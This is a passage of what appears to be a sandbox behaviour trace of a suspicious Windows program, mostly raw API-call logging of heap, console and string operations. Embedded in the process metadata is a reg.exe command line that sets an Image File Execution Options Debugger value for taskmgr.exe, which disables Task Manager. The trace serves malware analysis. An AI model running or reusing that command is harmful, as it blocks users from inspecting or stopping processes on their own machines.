lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x12f908, nSize=0x0, Arguments=0x0 | out: lpBuffer="䋘C律\x12⩿\x89宼\x89೨t") returned 0x27 [0257.107] GetLastError () returned 0x0 [0257.107] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0257.107] GetProcessHeap () returned 0x430000 [0257.107] GetProcessHeap () returned 0x430000 [0257.107] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434760) returned 1 [0257.107] GetProcessHeap () returned 0x430000 [0257.107] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434760) returned 0x2 [0257.107] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434760) returned 1 [0257.107] GetProcessHeap () returned 0x430000 [0257.107] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x50) returned 0x434330 [0257.107] RtlRestoreLastWin32Error () returned 0x2da000 [0257.107] LocalFree (hMem=0x4342d8) returned 0x0 [0257.107] __iob_func () returned 0x776f2608 [0257.108] _fileno (_File=0x776f2628) returned 1 [0257.108] _errno () returned 0x7405b0 [0257.108] _get_osfhandle (_FileHandle=1) returned 0x1ec [0257.108] _errno () returned 0x7405b0 [0257.108] GetFileType (hFile=0x1ec) returned 0x3 [0257.108] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0257.108] GetConsoleOutputCP () returned 0x1b5 [0257.109] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0257.109] GetConsoleOutputCP () returned 0x1b5 [0257.110] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x89d370, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The operation completed successfully.\r\n", lpUsedDefaultChar=0x0) returned 39 [0257.110] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 39 [0257.111] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x433c20) returned 1 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x433c20) returned 0xbc [0257.111] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x433c20) returned 1 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x437d30) returned 1 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x437d30) returned 0x10 [0257.111] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437d30) returned 1 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434a38) returned 1 [0257.111] GetProcessHeap () returned 0x430000 [0257.111] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434a38) returned 0x14 [0257.111] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434a38) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x433bf8) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x433bf8) returned 0x1e [0257.112] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x433bf8) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x437cd0) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x437cd0) returned 0x10 [0257.112] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437cd0) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434a18) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434a18) returned 0x14 [0257.112] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434a18) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434330) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434330) returned 0x50 [0257.112] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434330) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434498) returned 1 [0257.112] GetProcessHeap () returned 0x430000 [0257.112] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434498) returned 0x14 [0257.113] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434498) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434258) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434258) returned 0x14 [0257.113] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434258) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x433e38) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x433e38) returned 0x14 [0257.113] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x433e38) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x433e58) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x433e58) returned 0x14 [0257.113] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x433e58) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x437c88) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x437c88) returned 0x10 [0257.113] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437c88) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] GetProcessHeap () returned 0x430000 [0257.113] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x433e78) returned 1 [0257.113] GetProcessHeap () returned 0x430000 [0257.114] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x433e78) returned 0x14 [0257.114] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x433e78) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434518) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434518) returned 0x14 [0257.114] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434518) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434538) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434538) returned 0x14 [0257.114] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434538) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434558) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434558) returned 0x14 [0257.114] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434558) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x437ca0) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x437ca0) returned 0x10 [0257.114] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437ca0) returned 1 [0257.114] GetProcessHeap () returned 0x430000 [0257.114] GetProcessHeap () returned 0x430000 [0257.115] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x4349f8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4349f8) returned 0x14 [0257.115] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4349f8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434a58) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434a58) returned 0x14 [0257.115] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434a58) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x437cb8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x437cb8) returned 0x10 [0257.115] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437cb8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x434ba8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x434ba8) returned 0x14 [0257.115] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x434ba8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x437bc8) returned 1 [0257.115] GetProcessHeap () returned 0x430000 [0257.115] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x437bc8) returned 0x10 [0257.116] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437bc8) returned 1 [0257.116] exit (_Code=0) Thread: id = 210 os_tid = 0xea4 Process: id = "14" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x1753d000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 211 os_tid = 0xf58 [0257.274] GetModuleHandleA (lpModuleName=0x0) returned 0x890000 [0257.274] __set_app_type (_Type=0x1) [0257.274] __p__fmode () returned 0x776f3c14 [0257.274] __p__commode () returned 0x776f49ec [0257.275] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x89c780) returned 0x0 [0257.275] __wgetmainargs (in: _Argc=0x89d028, _Argv=0x89d02c, _Env=0x89d030, _DoWildCard=0, _StartInfo=0x89d03c | out: _Argc=0x89d028, _Argv=0x89d02c, _Env=0x89d030) returned 0 [0257.275] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0257.279] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0257.279] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0xdf7f4 | out: phkResult=0xdf7f4*=0x0) returned 0x2 [0257.280] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0257.280] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x10) returned 0x6f7c88 [0257.280] lstrlenW (lpString="") returned 0 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x2) returned 0x6f4748 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4480 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x10) returned 0x6f7d18 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4240 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f3e20 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f3e40 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f3e60 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x10) returned 0x6f7bb0 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4500 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.280] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4520 [0257.280] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4540 [0257.281] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f49e0 [0257.281] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x10) returned 0x6f7d30 [0257.281] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4a00 [0257.281] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4a20 [0257.281] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4a40 [0257.281] GetProcessHeap () returned 0x6f0000 [0257.281] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x14) returned 0x6f4b90 [0257.281] SetThreadUILanguage (LangId=0x0) returned 0x250409 [0257.288] GetProcessHeap () returned 0x6f0000 [0257.288] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x10) returned 0x6f7ce8 [0257.288] _memicmp (_Buf1=0x6f7ce8, _Buf2=0x891b8c, _Size=0x7) returned 0 [0257.288] GetProcessHeap () returned 0x6f0000 [0257.288] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x1e) returned 0x6f3be0 [0257.289] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0257.289] GetProcessHeap () returned 0x6f0000 [0257.289] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x10) returned 0x6f7d00 [0257.289] _memicmp (_Buf1=0x6f7d00, _Buf2=0x891b8c, _Size=0x7) returned 0 [0257.289] GetProcessHeap () returned 0x6f0000 [0257.289] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0xbc) returned 0x6f3c08 [0257.289] _vsnwprintf (in: _Buffer=0x6f3be0, _BufferCount=0xe, _Format="|%s|", _ArgList=0xdf708 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0257.289] _vsnwprintf (in: _Buffer=0x6f3c08, _BufferCount=0x5d, _Format="|%s|", _ArgList=0xdf708 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe|") returned 92 [0257.289] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0257.289] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe|") returned 92 [0257.289] RtlRestoreLastWin32Error () returned 0x259000 [0257.289] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0257.289] GetProcessHeap () returned 0x6f0000 [0257.289] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0xb6) returned 0x6f42c0 [0257.289] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0257.289] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.290] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.291] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.291] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.292] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.292] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.292] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.292] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0257.293] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.293] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0257.293] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0257.293] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0257.294] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0257.294] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0257.294] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0257.294] GetProcessHeap () returned 0x6f0000 [0257.294] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x28) returned 0x6f9430 [0257.294] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0257.294] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0257.294] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0257.294] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0257.294] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0257.294] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0257.295] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution 